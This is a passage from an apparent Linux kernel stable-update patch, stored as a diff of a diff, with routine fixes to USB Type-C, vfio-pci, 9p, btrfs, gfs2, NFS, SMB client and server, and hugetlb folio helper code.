+ 	struct usb_power_delivery_desc desc = { port->negotiated_rev };
+ 	struct usb_power_delivery_capabilities_desc caps = { };
+-	struct usb_power_delivery_capabilities *cap;
++	struct usb_power_delivery_capabilities *cap = port->partner_source_caps;
+ 
+ 	if (!port->partner_pd)
+ 		port->partner_pd = usb_power_delivery_register(NULL, &desc);
+@@ -2426,6 +2430,9 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->sink_caps, sizeof(u32) * port->nr_sink_caps);
+ 	caps.role = TYPEC_SINK;
+ 
++	if (cap)
++		usb_power_delivery_unregister_capabilities(cap);
++
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+ 		return PTR_ERR(cap);
+@@ -3635,7 +3642,10 @@ static int tcpm_init_vconn(struct tcpm_port *port)
+ 
+ static void tcpm_typec_connect(struct tcpm_port *port)
+ {
++	struct typec_partner *partner;
++
+ 	if (!port->connected) {
++		port->connected = true;
+ 		/* Make sure we don't report stale identity information */
+ 		memset(&port->partner_ident, 0, sizeof(port->partner_ident));
+ 		port->partner_desc.usb_pd = port->pd_capable;
+@@ -3645,9 +3655,13 @@ static void tcpm_typec_connect(struct tcpm_port *port)
+ 			port->partner_desc.accessory = TYPEC_ACCESSORY_AUDIO;
+ 		else
+ 			port->partner_desc.accessory = TYPEC_ACCESSORY_NONE;
+-		port->partner = typec_register_partner(port->typec_port,
+-						       &port->partner_desc);
+-		port->connected = true;
++		partner = typec_register_partner(port->typec_port, &port->partner_desc);
++		if (IS_ERR(partner)) {
++			dev_err(port->dev, "Failed to register partner (%ld)\n", PTR_ERR(partner));
++			return;
++		}
++
++		port->partner = partner;
+ 		typec_partner_set_usb_power_delivery(port->partner, port->partner_pd);
+ 	}
+ }
+@@ -3717,9 +3731,11 @@ static int tcpm_src_attach(struct tcpm_port *port)
+ static void tcpm_typec_disconnect(struct tcpm_port *port)
+ {
+ 	if (port->connected) {
+-		typec_partner_set_usb_power_delivery(port->partner, NULL);
+-		typec_unregister_partner(port->partner);
+-		port->partner = NULL;
++		if (port->partner) {
++			typec_partner_set_usb_power_delivery(port->partner, NULL);
++			typec_unregister_partner(port->partner);
++			port->partner = NULL;
++		}
+ 		port->connected = false;
+ 	}
+ }
+@@ -3935,6 +3951,9 @@ static enum typec_cc_status tcpm_pwr_opmode_to_rp(enum typec_pwr_opmode opmode)
+ 
+ static void tcpm_set_initial_svdm_version(struct tcpm_port *port)
+ {
++	if (!port->partner)
++		return;
++
+ 	switch (port->negotiated_rev) {
+ 	case PD_REV30:
+ 		break;
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 98f335cbbcdea..a163218fdc749 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -855,7 +855,7 @@ void ucsi_connector_change(struct ucsi *ucsi, u8 num)
+ 	struct ucsi_connector *con = &ucsi->connector[num - 1];
+ 
+ 	if (!(ucsi->ntfy & UCSI_ENABLE_NTFY_CONNECTOR_CHANGE)) {
+-		dev_dbg(ucsi->dev, "Bogus connector change event\n");
++		dev_dbg(ucsi->dev, "Early connector change event\n");
+ 		return;
+ 	}
+ 
+@@ -1248,6 +1248,7 @@ static int ucsi_init(struct ucsi *ucsi)
+ {
+ 	struct ucsi_connector *con, *connector;
+ 	u64 command, ntfy;
++	u32 cci;
+ 	int ret;
+ 	int i;
+ 
+@@ -1300,6 +1301,15 @@ static int ucsi_init(struct ucsi *ucsi)
+ 
+ 	ucsi->connector = connector;
+ 	ucsi->ntfy = ntfy;
++
++	mutex_lock(&ucsi->ppm_lock);
++	ret = ucsi->ops->read(ucsi, UCSI_CCI, &cci, sizeof(cci));
++	mutex_unlock(&ucsi->ppm_lock);
++	if (ret)
++		return ret;
++	if (UCSI_CCI_CONNECTOR(cci))
++		ucsi_connector_change(ucsi, UCSI_CCI_CONNECTOR(cci));
++
+ 	return 0;
+ 
+ err_unregister:
+diff --git a/drivers/vfio/pci/vfio_pci.c b/drivers/vfio/pci/vfio_pci.c
+index 1d4919edfbde4..a3ed9ab477486 100644
+--- a/drivers/vfio/pci/vfio_pci.c
++++ b/drivers/vfio/pci/vfio_pci.c
+@@ -71,6 +71,8 @@ static bool vfio_pci_dev_in_denylist(struct pci_dev *pdev)
+ 		case PCI_DEVICE_ID_INTEL_QAT_C62X_VF:
+ 		case PCI_DEVICE_ID_INTEL_QAT_DH895XCC:
+ 		case PCI_DEVICE_ID_INTEL_QAT_DH895XCC_VF:
++		case PCI_DEVICE_ID_INTEL_DSA_SPR0:
++		case PCI_DEVICE_ID_INTEL_IAX_SPR0:
+ 			return true;
+ 		default:
+ 			return false;
+diff --git a/fs/9p/vfs_file.c b/fs/9p/vfs_file.c
+index aec43ba837992..87222067fe5de 100644
+--- a/fs/9p/vfs_file.c
++++ b/fs/9p/vfs_file.c
+@@ -667,6 +667,7 @@ const struct file_operations v9fs_file_operations = {
+ 	.splice_read = generic_file_splice_read,
+ 	.splice_write = iter_file_splice_write,
+ 	.fsync = v9fs_file_fsync,
++	.setlease = simple_nosetlease,
+ };
+ 
+ const struct file_operations v9fs_file_operations_dotl = {
+@@ -708,4 +709,5 @@ const struct file_operations v9fs_mmap_file_operations_dotl = {
+ 	.splice_read = generic_file_splice_read,
+ 	.splice_write = iter_file_splice_write,
+ 	.fsync = v9fs_file_fsync_dotl,
++	.setlease = simple_nosetlease,
+ };
+diff --git a/fs/9p/vfs_inode.c b/fs/9p/vfs_inode.c
+index 5e2657c1dbbe6..8f287009545c9 100644
+--- a/fs/9p/vfs_inode.c
++++ b/fs/9p/vfs_inode.c
+@@ -85,7 +85,7 @@ static int p9mode2perm(struct v9fs_session_info *v9ses,
+ 	int res;
+ 	int mode = stat->mode;
+ 
+-	res = mode & S_IALLUGO;
++	res = mode & 0777; /* S_IRWXUGO */
+ 	if (v9fs_proto_dotu(v9ses)) {
+ 		if ((mode & P9_DMSETUID) == P9_DMSETUID)
+ 			res |= S_ISUID;
+@@ -181,6 +181,9 @@ int v9fs_uflags2omode(int uflags, int extended)
+ 		break;
+ 	}
+ 
++	if (uflags & O_TRUNC)
++		ret |= P9_OTRUNC;
++
+ 	if (extended) {
+ 		if (uflags & O_EXCL)
+ 			ret |= P9_OEXCL;
+diff --git a/fs/9p/vfs_super.c b/fs/9p/vfs_super.c
+index 2d9ee073d12c3..7c35347f1d9be 100644
+--- a/fs/9p/vfs_super.c
++++ b/fs/9p/vfs_super.c
+@@ -342,6 +342,7 @@ static const struct super_operations v9fs_super_ops = {
+ 	.alloc_inode = v9fs_alloc_inode,
+ 	.free_inode = v9fs_free_inode,
+ 	.statfs = simple_statfs,
++	.drop_inode = v9fs_drop_inode,
+ 	.evict_inode = v9fs_evict_inode,
+ 	.show_options = v9fs_show_options,
+ 	.umount_begin = v9fs_umount_begin,
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 539bc9bdcb93f..5f923c9b773e0 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -1324,19 +1324,14 @@ int btrfs_alloc_page_array(unsigned int nr_pages, struct page **page_array)
+ 		unsigned int last = allocated;
+ 
+ 		allocated = alloc_pages_bulk_array(GFP_NOFS, nr_pages, page_array);
+-
+-		if (allocated == nr_pages)
+-			return 0;
+-
+-		/*
+-		 * During this iteration, no page could be allocated, even
+-		 * though alloc_pages_bulk_array() falls back to alloc_page()
+-		 * if  it could not bulk-allocate. So we must be out of memory.
+-		 */
+-		if (allocated == last)
++		if (unlikely(allocated == last)) {
++			/* No progress, fail and do cleanup. */
++			for (int i = 0; i < allocated; i++) {
++				__free_page(page_array[i]);
++				page_array[i] = NULL;
++			}
+ 			return -ENOMEM;
+-
+-		memalloc_retry_wait(GFP_NOFS);
++		}
+ 	}
+ 	return 0;
+ }
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index f7f4bcc094642..10ded9c2be03b 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -2472,7 +2472,7 @@ void btrfs_clear_delalloc_extent(struct inode *vfs_inode,
+ 		 */
+ 		if (bits & EXTENT_CLEAR_META_RESV &&
+ 		    root != fs_info->tree_root)
+-			btrfs_delalloc_release_metadata(inode, len, false);
++			btrfs_delalloc_release_metadata(inode, len, true);
+ 
+ 		/* For sanity tests. */
+ 		if (btrfs_is_testing(fs_info))
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 754a9fb0165fa..ec3db315f5618 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7955,8 +7955,8 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	sctx->rbtree_new_refs = RB_ROOT;
+ 	sctx->rbtree_deleted_refs = RB_ROOT;
+ 
+-	sctx->clone_roots = kvcalloc(sizeof(*sctx->clone_roots),
+-				     arg->clone_sources_count + 1,
++	sctx->clone_roots = kvcalloc(arg->clone_sources_count + 1,
++				     sizeof(*sctx->clone_roots),
+ 				     GFP_KERNEL);
+ 	if (!sctx->clone_roots) {
+ 		ret = -ENOMEM;
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 5549c843f0d3f..a7853a3a57190 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -1440,6 +1440,7 @@ static noinline int commit_fs_roots(struct btrfs_trans_handle *trans)
+ 			radix_tree_tag_clear(&fs_info->fs_roots_radix,
+ 					(unsigned long)root->root_key.objectid,
+ 					BTRFS_ROOT_TRANS_TAG);
++			btrfs_qgroup_free_meta_all_pertrans(root);
+ 			spin_unlock(&fs_info->fs_roots_radix_lock);
+ 
+ 			btrfs_free_log(trans, root);
+@@ -1464,7 +1465,6 @@ static noinline int commit_fs_roots(struct btrfs_trans_handle *trans)
+ 			if (ret2)
+ 				return ret2;
+ 			spin_lock(&fs_info->fs_roots_radix_lock);
+-			btrfs_qgroup_free_meta_all_pertrans(root);
+ 		}
+ 	}
+ 	spin_unlock(&fs_info->fs_roots_radix_lock);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index ab5d410d560e7..8c7e74499ed17 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -1233,25 +1233,32 @@ static int open_fs_devices(struct btrfs_fs_devices *fs_devices,
+ 	struct btrfs_device *device;
+ 	struct btrfs_device *latest_dev = NULL;
+ 	struct btrfs_device *tmp_device;
++	int ret = 0;
+ 
+ 	flags |= FMODE_EXCL;
+ 
+ 	list_for_each_entry_safe(device, tmp_device, &fs_devices->devices,
+ 				 dev_list) {
+-		int ret;
++		int ret2;
+ 
+-		ret = btrfs_open_one_device(fs_devices, device, flags, holder);
+-		if (ret == 0 &&
++		ret2 = btrfs_open_one_device(fs_devices, device, flags, holder);
++		if (ret2 == 0 &&
+ 		    (!latest_dev || device->generation > latest_dev->generation)) {
+ 			latest_dev = device;
+-		} else if (ret == -ENODATA) {
++		} else if (ret2 == -ENODATA) {
+ 			fs_devices->num_devices--;
+ 			list_del(&device->dev_list);
+ 			btrfs_free_device(device);
+ 		}
++		if (ret == 0 && ret2 != 0)
++			ret = ret2;
+ 	}
+-	if (fs_devices->open_devices == 0)
++
++	if (fs_devices->open_devices == 0) {
++		if (ret)
++			return ret;
+ 		return -EINVAL;
++	}
+ 
+ 	fs_devices->opened = 1;
+ 	fs_devices->latest_dev = latest_dev;
+@@ -3390,6 +3397,7 @@ static int btrfs_relocate_sys_chunks(struct btrfs_fs_info *fs_info)
+ 			 * alignment and size).
+ 			 */
+ 			ret = -EUCLEAN;
++			mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 			goto error;
+ 		}
+ 
+diff --git a/fs/gfs2/bmap.c b/fs/gfs2/bmap.c
+index e7537fd305dd2..9ad11e5bf14c3 100644
+--- a/fs/gfs2/bmap.c
++++ b/fs/gfs2/bmap.c
+@@ -1702,7 +1702,8 @@ static int punch_hole(struct gfs2_inode *ip, u64 offset, u64 length)
+ 	struct buffer_head *dibh, *bh;
+ 	struct gfs2_holder rd_gh;
+ 	unsigned int bsize_shift = sdp->sd_sb.sb_bsize_shift;
+-	u64 lblock = (offset + (1 << bsize_shift) - 1) >> bsize_shift;
++	unsigned int bsize = 1 << bsize_shift;
++	u64 lblock = (offset + bsize - 1) >> bsize_shift;
+ 	__u16 start_list[GFS2_MAX_META_HEIGHT];
+ 	__u16 __end_list[GFS2_MAX_META_HEIGHT], *end_list = NULL;
+ 	unsigned int start_aligned, end_aligned;
+@@ -1713,7 +1714,7 @@ static int punch_hole(struct gfs2_inode *ip, u64 offset, u64 length)
+ 	u64 prev_bnr = 0;
+ 	__be64 *start, *end;
+ 
+-	if (offset >= maxsize) {
++	if (offset + bsize - 1 >= maxsize) {
+ 		/*
+ 		 * The starting point lies beyond the allocated meta-data;
+ 		 * there are no blocks do deallocate.
+diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
+index 4fe4b3393e71c..330729445d8ab 100644
+--- a/fs/hugetlbfs/inode.c
++++ b/fs/hugetlbfs/inode.c
+@@ -1108,10 +1108,10 @@ static int hugetlbfs_migrate_folio(struct address_space *mapping,
+ 	if (rc != MIGRATEPAGE_SUCCESS)
+ 		return rc;
+ 
+-	if (hugetlb_page_subpool(&src->page)) {
+-		hugetlb_set_page_subpool(&dst->page,
+-					hugetlb_page_subpool(&src->page));
+-		hugetlb_set_page_subpool(&src->page, NULL);
++	if (hugetlb_folio_subpool(src)) {
++		hugetlb_set_folio_subpool(dst,
++					hugetlb_folio_subpool(src));
++		hugetlb_set_folio_subpool(src, NULL);
+ 	}
+ 
+ 	if (mode != MIGRATE_SYNC_NO_COPY)
+diff --git a/fs/nfs/client.c b/fs/nfs/client.c
+index f50e025ae4064..755256875052f 100644
+--- a/fs/nfs/client.c
++++ b/fs/nfs/client.c
+@@ -73,7 +73,6 @@ const struct rpc_program nfs_program = {
+ 	.number			= NFS_PROGRAM,
+ 	.nrvers			= ARRAY_SIZE(nfs_version),
+ 	.version		= nfs_version,
+-	.stats			= &nfs_rpcstat,
+ 	.pipe_dir_name		= NFS_PIPE_DIRNAME,
+ };
+ 
+@@ -496,6 +495,7 @@ int nfs_create_rpc_client(struct nfs_client *clp,
+ 			  const struct nfs_client_initdata *cl_init,
+ 			  rpc_authflavor_t flavor)
+ {
++	struct nfs_net		*nn = net_generic(clp->cl_net, nfs_net_id);
+ 	struct rpc_clnt		*clnt = NULL;
+ 	struct rpc_create_args args = {
+ 		.net		= clp->cl_net,
+@@ -507,6 +507,7 @@ int nfs_create_rpc_client(struct nfs_client *clp,
+ 		.servername	= clp->cl_hostname,
+ 		.nodename	= cl_init->nodename,
+ 		.program	= &nfs_program,
++		.stats		= &nn->rpcstats,
+ 		.version	= clp->rpc_ops->version,
+ 		.authflavor	= flavor,
+ 		.cred		= cl_init->cred,
+@@ -1142,6 +1143,8 @@ void nfs_clients_init(struct net *net)
+ #endif
+ 	spin_lock_init(&nn->nfs_client_lock);
+ 	nn->boot_time = ktime_get_real();
++	memset(&nn->rpcstats, 0, sizeof(nn->rpcstats));
++	nn->rpcstats.program = &nfs_program;
+ 
+ 	nfs_netns_sysfs_setup(nn, net);
+ }
+diff --git a/fs/nfs/inode.c b/fs/nfs/inode.c
+index e0c1fb98f907a..cf8c3771e4bfb 100644
+--- a/fs/nfs/inode.c
++++ b/fs/nfs/inode.c
+@@ -2333,12 +2333,21 @@ EXPORT_SYMBOL_GPL(nfs_net_id);
+ 
+ static int nfs_net_init(struct net *net)
+ {
++	struct nfs_net *nn = net_generic(net, nfs_net_id);
++
+ 	nfs_clients_init(net);
++
++	if (!rpc_proc_register(net, &nn->rpcstats)) {
++		nfs_clients_exit(net);
++		return -ENOMEM;
++	}
++
+ 	return nfs_fs_proc_net_init(net);
+ }
+ 
+ static void nfs_net_exit(struct net *net)
+ {
++	rpc_proc_unregister(net, "nfs");
+ 	nfs_fs_proc_net_exit(net);
+ 	nfs_clients_exit(net);
+ }
+@@ -2393,15 +2402,12 @@ static int __init init_nfs_fs(void)
+ 	if (err)
+ 		goto out1;
+ 
+-	rpc_proc_register(&init_net, &nfs_rpcstat);
+-
+ 	err = register_nfs_fs();
+ 	if (err)
+ 		goto out0;
+ 
+ 	return 0;
+ out0:
+-	rpc_proc_unregister(&init_net, "nfs");
+ 	nfs_destroy_directcache();
+ out1:
+ 	nfs_destroy_writepagecache();
+@@ -2431,7 +2437,6 @@ static void __exit exit_nfs_fs(void)
+ 	nfs_destroy_inodecache();
+ 	nfs_destroy_nfspagecache();
+ 	unregister_pernet_subsys(&nfs_net_ops);
+-	rpc_proc_unregister(&init_net, "nfs");
+ 	unregister_nfs_fs();
+ 	nfs_fs_proc_exit();
+ 	nfsiod_stop();
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index 35a8ae46b6c34..b3b801e7c4bc5 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -443,8 +443,6 @@ int nfs_try_get_tree(struct fs_context *);
+ int nfs_get_tree_common(struct fs_context *);
+ void nfs_kill_super(struct super_block *);
+ 
+-extern struct rpc_stat nfs_rpcstat;
+-
+ extern int __init register_nfs_fs(void);
+ extern void __exit unregister_nfs_fs(void);
+ extern bool nfs_sb_active(struct super_block *sb);
+diff --git a/fs/nfs/netns.h b/fs/nfs/netns.h
+index c8374f74dce11..a68b21603ea9a 100644
+--- a/fs/nfs/netns.h
++++ b/fs/nfs/netns.h
+@@ -9,6 +9,7 @@
+ #include <linux/nfs4.h>
+ #include <net/net_namespace.h>
+ #include <net/netns/generic.h>
++#include <linux/sunrpc/stats.h>
+ 
+ struct bl_dev_msg {
+ 	int32_t status;
+@@ -34,6 +35,7 @@ struct nfs_net {
+ 	struct nfs_netns_client *nfs_client;
+ 	spinlock_t nfs_client_lock;
+ 	ktime_t boot_time;
++	struct rpc_stat rpcstats;
+ #ifdef CONFIG_PROC_FS
+ 	struct proc_dir_entry *proc_nfsfs;
+ #endif
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index 338b34c99b2de..3fdafb9297f13 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -1045,18 +1045,45 @@ cifs_cancelled_callback(struct mid_q_entry *mid)
+ struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses)
+ {
+ 	uint index = 0;
++	unsigned int min_in_flight = UINT_MAX, max_in_flight = 0;
++	struct TCP_Server_Info *server = NULL;
++	int i;
+ 
+ 	if (!ses)
+ 		return NULL;
+ 
+-	/* round robin */
+-	index = (uint)atomic_inc_return(&ses->chan_seq);
+-
+ 	spin_lock(&ses->chan_lock);
+-	index %= ses->chan_count;
++	for (i = 0; i < ses->chan_count; i++) {
++		server = ses->chans[i].server;
++		if (!server)
++			continue;
++
++		/*
++		 * strictly speaking, we should pick up req_lock to read
++		 * server->in_flight. But it shouldn't matter much here if we
++		 * race while reading this data. The worst that can happen is
++		 * that we could use a channel that's not least loaded. Avoiding
++		 * taking the lock could help reduce wait time, which is
++		 * important for this function
++		 */
++		if (server->in_flight < min_in_flight) {
++			min_in_flight = server->in_flight;
++			index = i;
++		}
++		if (server->in_flight > max_in_flight)
++			max_in_flight = server->in_flight;
++	}
++
++	/* if all channels are equally loaded, fall back to round-robin */
++	if (min_in_flight == max_in_flight) {
++		index = (uint)atomic_inc_return(&ses->chan_seq);
++		index %= ses->chan_count;
++	}
++
++	server = ses->chans[index].server;
+ 	spin_unlock(&ses->chan_lock);
+ 
+-	return ses->chans[index].server;
++	return server;
+ }
+ 
+ int
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index 1253e9bde34c8..1b98796499d78 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -612,13 +612,23 @@ static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+ 
+ 		if (opinfo->op_state == OPLOCK_CLOSING)
+ 			return -ENOENT;
+-		else if (!opinfo->is_lease && opinfo->level <= req_op_level)
+-			return 1;
++		else if (opinfo->level <= req_op_level) {
++			if (opinfo->is_lease &&
++			    opinfo->o_lease->state !=
++			     (SMB2_LEASE_HANDLE_CACHING_LE |
++			      SMB2_LEASE_READ_CACHING_LE))
++				return 1;
++		}
+ 	}
+ 
+-	if (!opinfo->is_lease && opinfo->level <= req_op_level) {
+-		wake_up_oplock_break(opinfo);
+-		return 1;
++	if (opinfo->level <= req_op_level) {
++		if (opinfo->is_lease &&
++		    opinfo->o_lease->state !=
++		     (SMB2_LEASE_HANDLE_CACHING_LE |
++		      SMB2_LEASE_READ_CACHING_LE)) {
++			wake_up_oplock_break(opinfo);
++			return 1;
++		}
+ 	}
+ 	return 0;
+ }
+@@ -886,7 +896,6 @@ static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
+ 		struct lease *lease = brk_opinfo->o_lease;
+ 
+ 		atomic_inc(&brk_opinfo->breaking_cnt);
+-
+ 		err = oplock_break_pending(brk_opinfo, req_op_level);
+ 		if (err)
+ 			return err < 0 ? err : 0;
+@@ -1199,7 +1208,9 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 
+ 	/* Only v2 leases handle the directory */
+ 	if (S_ISDIR(file_inode(fp->filp)->i_mode)) {
+-		if (!lctx || lctx->version != 2)
++		if (!lctx || lctx->version != 2 ||
++		    (lctx->flags != SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE &&
++		     !lctx->epoch))
+ 			return 0;
+ 	}
+ 
+@@ -1461,8 +1472,9 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ 		buf->lcontext.LeaseFlags = lease->flags;
+ 		buf->lcontext.Epoch = cpu_to_le16(lease->epoch);
+ 		buf->lcontext.LeaseState = lease->state;
+-		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+-		       SMB2_LEASE_KEY_SIZE);
++		if (lease->flags == SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE)
++			memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
++			       SMB2_LEASE_KEY_SIZE);
+ 		buf->ccontext.DataOffset = cpu_to_le16(offsetof
+ 				(struct create_lease_v2, lcontext));
+ 		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
+@@ -1527,8 +1539,9 @@ struct lease_ctx_info *parse_lease_state(void *open_req, bool is_dir)
+ 		lreq->flags = lc->lcontext.LeaseFlags;
+ 		lreq->epoch = lc->lcontext.Epoch;
+ 		lreq->duration = lc->lcontext.LeaseDuration;
+-		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+-				SMB2_LEASE_KEY_SIZE);
++		if (lreq->flags == SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE)
++			memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
++			       SMB2_LEASE_KEY_SIZE);
+ 		lreq->version = 2;
+ 	} else {
+ 		struct create_lease *lc = (struct create_lease *)cc;
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+index 9d4222154dcc0..0012919309f11 100644
+--- a/fs/smb/server/transport_tcp.c
++++ b/fs/smb/server/transport_tcp.c
+@@ -446,6 +446,10 @@ static int create_socket(struct interface *iface)
+ 		sin6.sin6_family = PF_INET6;
+ 		sin6.sin6_addr = in6addr_any;
+ 		sin6.sin6_port = htons(server_conf.tcp_port);
++
++		lock_sock(ksmbd_socket->sk);
++		ksmbd_socket->sk->sk_ipv6only = false;
++		release_sock(ksmbd_socket->sk);
+ 	}
+ 
+ 	ksmbd_tcp_nodelay(ksmbd_socket);
+diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h
+index 574b4121ebe3e..8f50c589ad5f4 100644
+--- a/include/linux/compiler_types.h
++++ b/include/linux/compiler_types.h
+@@ -226,6 +226,17 @@ struct ftrace_likely_data {
+ # define __no_kcsan
+ #endif
+ 
++#ifdef __SANITIZE_MEMORY__
++/*
++ * Similarly to KASAN and KCSAN, KMSAN loses function attributes of inlined
++ * functions, therefore disabling KMSAN checks also requires disabling inlining.
++ *
++ * __no_sanitize_or_inline effectively prevents KMSAN from reporting errors
++ * within the function and marks all its outputs as initialized.
++ */
++# define __no_sanitize_or_inline __no_kmsan_checks notrace __maybe_unused
++#endif
++
+ #ifndef __no_sanitize_or_inline
+ #define __no_sanitize_or_inline __always_inline
+ #endif
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index 5d6a5f3097cd0..b79097b9070b3 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -659,11 +659,4 @@ static inline bool dma_fence_is_container(struct dma_fence *fence)
+ 	return dma_fence_is_array(fence) || dma_fence_is_chain(fence);
+ }
+ 
+-#define DMA_FENCE_WARN(f, fmt, args...) \
+-	do {								\
+-		struct dma_fence *__ff = (f);				\
+-		pr_warn("f %llu#%llu: " fmt, __ff->context, __ff->seqno,\
+-			 ##args);					\
+-	} while (0)
+-
+ #endif /* __LINUX_DMA_FENCE_H */
+diff --git a/include/linux/gfp_types.h b/include/linux/gfp_types.h
+index d88c46ca82e17..6811ab702e8dc 100644
+--- a/include/linux/gfp_types.h
++++ b/include/linux/gfp_types.h
+@@ -2,6 +2,8 @@
+ #ifndef __LINUX_GFP_TYPES_H
+ #define __LINUX_GFP_TYPES_H
+ 
++#include <linux/bits.h>
++
+ /* The typedef is in types.h but we want the documentation here */
+ #if 0
+ /**
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 1c6f35ba1604f..37eeef9841c4e 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -625,26 +625,50 @@ enum hugetlb_page_flags {
+  */
+ #ifdef CONFIG_HUGETLB_PAGE
+ #define TESTHPAGEFLAG(uname, flname)				\
++static __always_inline						\
++bool folio_test_hugetlb_##flname(struct folio *folio)		\
++	{	void *private = &folio->private;		\
++		return test_bit(HPG_##flname, private);		\
++	}							\
+ static inline int HPage##uname(struct page *page)		\
+ 	{ return test_bit(HPG_##flname, &(page->private)); }
+ 
+ #define SETHPAGEFLAG(uname, flname)				\
++static __always_inline						\
++void folio_set_hugetlb_##flname(struct folio *folio)		\
++	{	void *private = &folio->private;		\
++		set_bit(HPG_##flname, private);			\
++	}							\
+ static inline void SetHPage##uname(struct page *page)		\
+ 	{ set_bit(HPG_##flname, &(page->private)); }
+ 
+ #define CLEARHPAGEFLAG(uname, flname)				\
++static __always_inline						\
++void folio_clear_hugetlb_##flname(struct folio *folio)		\
++	{	void *private = &folio->private;		\
++		clear_bit(HPG_##flname, private);		\
++	}							\
+ static inline void ClearHPage##uname(struct page *page)		\
+ 	{ clear_bit(HPG_##flname, &(page->private)); }
+ #else
+ #define TESTHPAGEFLAG(uname, flname)				\
++static inline bool						\
++folio_test_hugetlb_##flname(struct folio *folio)		\
++	{ return 0; }						\
+ static inline int HPage##uname(struct page *page)		\
+ 	{ return 0; }
+ 
+ #define SETHPAGEFLAG(uname, flname)				\
++static inline void						\
++folio_set_hugetlb_##flname(struct folio *folio) 		\
++	{ }							\
+ static inline void SetHPage##uname(struct page *page)		\
+ 	{ }
+ 
+ #define CLEARHPAGEFLAG(uname, flname)				\
++static inline void						\
++folio_clear_hugetlb_##flname(struct folio *folio)		\
++	{ }							\
+ static inline void ClearHPage##uname(struct page *page)		\
+ 	{ }
+ #endif
+@@ -730,18 +754,29 @@ extern unsigned int default_hstate_idx;
+ 
+ #define default_hstate (hstates[default_hstate_idx])
+ 
++static inline struct hugepage_subpool *hugetlb_folio_subpool(struct folio *folio)
++{
++	return (void *)folio_get_private_1(folio);
++}
++
+ /*
+  * hugetlb page subpool pointer located in hpage[1].private
+  */
+ static inline struct hugepage_subpool *hugetlb_page_subpool(struct page *hpage)
+ {
+-	return (void *)page_private(hpage + SUBPAGE_INDEX_SUBPOOL);
++	return hugetlb_folio_subpool(page_folio(hpage));
++}
++
++static inline void hugetlb_set_folio_subpool(struct folio *folio,
++					struct hugepage_subpool *subpool)
++{
++	folio_set_private_1(folio, (unsigned long)subpool);
+ }
+ 
+ static inline void hugetlb_set_page_subpool(struct page *hpage,
+ 					struct hugepage_subpool *subpool)
+ {
+-	set_page_private(hpage + SUBPAGE_INDEX_SUBPOOL, (unsigned long)subpool);
++	hugetlb_set_folio_subpool(page_folio(hpage), subpool);
+ }
+ 
+ static inline struct hstate *hstate_file(struct file *f)
+@@ -828,10 +863,15 @@ static inline pte_t arch_make_huge_pte(pte_t entry, unsigned int shift,
+ }
+ #endif
+ 
++static inline struct hstate *folio_hstate(struct folio *folio)
++{
++	VM_BUG_ON_FOLIO(!folio_test_hugetlb(folio), folio);
++	return size_to_hstate(folio_size(folio));
++}
++
+ static inline struct hstate *page_hstate(struct page *page)
+ {
+-	VM_BUG_ON_PAGE(!PageHuge(page), page);
+-	return size_to_hstate(page_size(page));
++	return folio_hstate(page_folio(page));
+ }
+ 
+ static inline unsigned hstate_index_to_shift(unsigned index)
+@@ -1042,6 +1082,11 @@ static inline struct hstate *hstate_vma(struct vm_area_struct *vma)
+ 	return NULL;
+ }
+ 
++static inline struct hstate *folio_hstate(struct folio *folio)
++{
++	return NULL;
++}
++
+ static inline struct hstate *page_hstate(struct page *page)
+ {
+ 	return NULL;
+diff --git a/include/linux/hugetlb_cgroup.h b/include/linux/hugetlb_cgroup.h
+index 630cd255d0cfd..241bf4fe701ae 100644
+--- a/include/linux/hugetlb_cgroup.h
